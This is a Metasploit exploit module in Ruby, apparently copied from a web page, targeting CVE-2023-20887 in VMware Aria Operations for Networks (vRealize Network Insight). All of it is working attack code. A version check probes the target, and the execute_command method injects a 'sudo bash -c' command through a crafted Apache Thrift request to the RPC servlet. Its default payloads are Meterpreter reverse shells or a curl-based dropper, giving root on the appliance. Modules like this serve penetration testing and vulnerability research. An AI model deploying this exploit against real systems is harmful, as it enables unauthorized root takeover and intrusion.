<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',<br /> 'Description' => %q{<br /> VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection<br /> when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a<br /> remote unauthenticated attacker to execute arbitrary commands on the underlying operating system<br /> as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.<br /> VMware has evaluated the severity of this issue to be in the Critical severity range with a<br /> maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the<br /> context of 'root' on the appliance.<br /> VMWare 6.x version are vulnerable.<br /><br /> This module exploits the vulnerability to upload and execute payloads gaining root privileges.<br /> Successfully tested against version 6.8.0.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Sina Kheirkhah', # Metasploit Module, PoC. (@SinSinology) of Summoning Team (@SummoningTeam) on twitter<br /> 'Anonymous with Trend Micro Zero Day Initiative',<br /> 'h00die' # msf module updates, corrections, qol<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-20887'],<br /> ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],<br /> ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],<br /> ['URL', 'https://github.com/sinsinology/CVE-2023-20887']<br /> ],<br /> 'DisclosureDate' => '2023-06-07',<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X64],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :in_memory,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'curl', 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Payload' => {<br /> 'BadChars' => "\x27"<br /> },<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check_vrni<br /> res = nil<br /> (2..10).step do |x|<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.#{x}.0/locales/en-GB/components/UI"),<br /> 'vars_get' => {<br /> 'pseudo' => 'false'<br /> }<br /> })<br /> next if res && res.code == 200 && res.body.include?('Failed to get locale list for vRNIUI')<br /><br /> break<br /> end<br /> res<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> print_status('Attempting to execute shell')<br /> shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"#{rand(1000..9999)}\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"#{Rex::Text.rand_text_alpha(4)}\"},\"4\":{\"lst\":[\"str\",2,\"#{Rex::Text.rand_text_alpha(4)}\",\"#{Rex::Text.rand_text_alpha(4)}\"]}}]"<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/saas./resttosaasservlet'),<br /> 'ctype' => 'application/x-thrift',<br /> 'headers' => {<br /> 'Accept' => 'application/json, text/plain, */*'<br /> },<br /> 'encode_params' => false,<br /> 'data' => shell<br /> })<br /> fail_with(Failure::Unknown, 'Communication error occurred') if res.nil?<br /> end<br /><br /> # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string<br /> # that indicates the target is running VMWare Aria Operations for Networks (vRealize Network Insight)<br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = check_vrni<br /> return CheckCode::Unknown('No response received from the target!') unless res<br /><br /> body = res.get_json_document<br /> if body.nil? || body['data']['productName'] != 'vRNIUI'<br /> return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')<br /> end<br /><br /> version = Rex::Version.new(body['data']['version'])<br /> return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{version} was found.") if version >= Rex::Version.new('6.2') && version <= Rex::Version.new('6.10')<br /><br /> CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{version}")<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :in_memory<br /> print_status("Executing #{target.name} with #{payload.encoded}")<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}")<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
